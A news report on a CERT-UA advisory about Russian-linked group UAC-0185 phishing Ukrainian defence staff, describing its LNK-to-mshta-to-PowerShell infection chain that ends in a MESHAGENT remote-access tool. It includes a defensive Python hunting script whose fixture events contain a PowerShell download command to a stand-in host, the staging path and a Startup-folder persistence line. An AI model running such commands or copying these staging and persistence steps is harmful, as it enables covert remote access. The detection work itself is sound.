Russian state-linked hackers reportedly target Ukrainian defense contractors

Ukraine said threat actors linked to the Russian state were targeting its defense contractors.

Ukraine’s Computer Emergency Response Team (CERT-UA) released a report stating that a group called UAC-0185 sent emails containing malicious links to employees of Ukrainian defense companies and defense forces.

According to CERT-UA, the group posed as the Ukrainian Union of Industrialists and Entrepreneurs (USPP), claiming to invite personnel to a real conference on the transition of Ukrainian defense products to NATO standards, which was held on November 5.

The emails contained a link that recipients were led to believe provided access to the invitation details, but which instead downloaded a file called “list_02-1-437.lnk.”

“Opening the LNK file will download and launch the ‘start.hta’ file using the standard utility mshta.exe,” CERT-UA said.

“The mentioned HTA file contains JavaScript code designed to launch two PowerShell commands, one of which will download and open a bait file in the form of a USPP letter, and the second will download the ‘Front.png’ file, which is a ZIP archive containing three files: ‘Main.bat’, ‘Registry.hta’ and ‘update.exe’, extract the contents of the archive into the directory ‘%LOCALAPPDATA%\Microsoft\EdgeUpdate\Update\’ and launch the BAT file ‘Main.bat’.

“The latter will move the ‘Registry.hta’ file to the autorun directory, run it and delete some of the downloaded files from the computer.

“Finally, ‘Registry.hta’ will launch ‘update.exe’, which is classified as a MESHAGENT remote control program.”
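The staged chain CERT-UA describes (LNK, mshta.exe running start.hta, PowerShell, a ZIP disguised as Front.png, Main.bat, Registry.hta in the autorun directory, update.exe) gives a defender several host-side signals to key on. The script below is an added example written for this page; it is not CERT-UA's code and nothing in it comes from the report beyond the file names and the staging directory. It models the chain as constructed Sysmon-style process-creation events (the user name, host paths and download URL are assumptions), tags the stages worth alerting on, and shows the magic-byte check that exposes a file named Front.png as a ZIP archive.

```python
import io
import re
import zipfile

# Constructed process-creation events modelling the reported chain.
# User name, paths and the download URL are assumptions for this example.
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\olena\AppData\Local\Temp\start.hta"'},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -c iwr https://example.invalid/Front.png "
                r"-OutFile $env:LOCALAPPDATA\Microsoft\EdgeUpdate\Update\Front.png"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\olena\AppData\Local\Microsoft\EdgeUpdate\Update\Main.bat"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\olena\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Registry.hta"'},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Users\olena\AppData\Local\Microsoft\EdgeUpdate\Update\update.exe",
     "cmdline": r"update.exe"},
    # Benign control event: nothing here should fire.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\olena\Documents\notes.txt"},
]

HTA_ARG = re.compile(r"\.hta\b", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
# Per-user staging directory named in the report, in path, $env: and %VAR% spellings.
STAGING_DIR = re.compile(
    r"(?:\\AppData\\Local|\$env:LOCALAPPDATA|%LOCALAPPDATA%)\\Microsoft\\EdgeUpdate\\Update\\",
    re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: dict) -> list:
    """Return the chain stages a single process-creation event matches."""
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    tags = []
    if image == "mshta.exe" and HTA_ARG.search(cmd):
        tags.append("mshta_runs_hta")              # stage: LNK -> mshta.exe start.hta
        if STARTUP_DIR.search(cmd):
            tags.append("hta_in_startup_folder")   # stage: Registry.hta persisted in autorun
    if image in {"powershell.exe", "pwsh.exe"} and parent == "mshta.exe":
        tags.append("powershell_spawned_by_mshta") # stage: HTA launching PowerShell
    if STAGING_DIR.search(ev["image"]) or STAGING_DIR.search(cmd):
        tags.append("edgeupdate_staging_path")     # stage: files dropped/run from staging dir
    return tags


def hunt(events: list) -> list:
    """(index, tags) for every event that matched at least one stage."""
    return [(i, classify(ev)) for i, ev in enumerate(events) if classify(ev)]


def chain_detected(events: list) -> bool:
    """True when three distinct stages of the chain are seen, not just one noisy hit."""
    seen = {t for _, tags in hunt(events) for t in tags}
    return {"mshta_runs_hta", "powershell_spawned_by_mshta", "hta_in_startup_folder"} <= seen


ZIP_MAGIC = b"PK\x03\x04"          # local file header of every ZIP archive
ARCHIVE_EXTS = {"zip", "jar", "docx", "xlsx", "pptx", "apk"}


def disguised_archive(filename: str, data: bytes) -> bool:
    """True when the bytes are a ZIP but the extension says otherwise (e.g. Front.png)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return data[:4] == ZIP_MAGIC and ext not in ARCHIVE_EXTS


def archive_members(data: bytes) -> list:
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return sorted(z.namelist())


def build_front_png() -> bytes:
    """Constructed stand-in for Front.png: a ZIP with the three reported member names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("Main.bat", "@echo off\r\nrem placeholder, not the real dropper\r\n")
        z.writestr("Registry.hta", "<html><body>placeholder</body></html>")
        z.writestr("update.exe", b"MZ placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for i, tags in hunt(EVENTS):
        print(f"event {i}: {', '.join(tags)}")
    print("chain detected:", chain_detected(EVENTS))
    png = build_front_png()
    print("Front.png is a ZIP:", disguised_archive("Front.png", png), archive_members(png))
```

The single-stage tags are deliberately separate from `chain_detected`: mshta.exe running an .hta file is common enough in some environments to be noisy on its own, while the same host showing mshta.exe, a PowerShell child of mshta.exe and an .hta in the Startup folder within one session is a much stronger signal. The magic-byte check is the same one a proxy or EDR content rule would apply to a download whose extension disagrees with its first bytes.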

The malware contained in the files used is believed to have been used in cyberattacks since early 2023.

Although Ukraine has not named Russia as behind the attacks, UAC-0185, also known as UNC4221, was connected to the Russian government by SentinelOne earlier this year.

The group has been active since at least 2022, according to CERT-UA, and is focused on stealing credentials for Signal, Telegram, WhatsApp and a number of military systems such as DELTA, TENETA and Kropyva.

“At the same time, cyberattacks are carried out to a more limited extent, aimed at obtaining unauthorized remote access to the computers of employees of enterprises of the defense industrial complex, as well as to the Defense Forces of Ukraine, using specialized software tools, including MESHAGENT and ULTRAVNC,” said CERT-UA.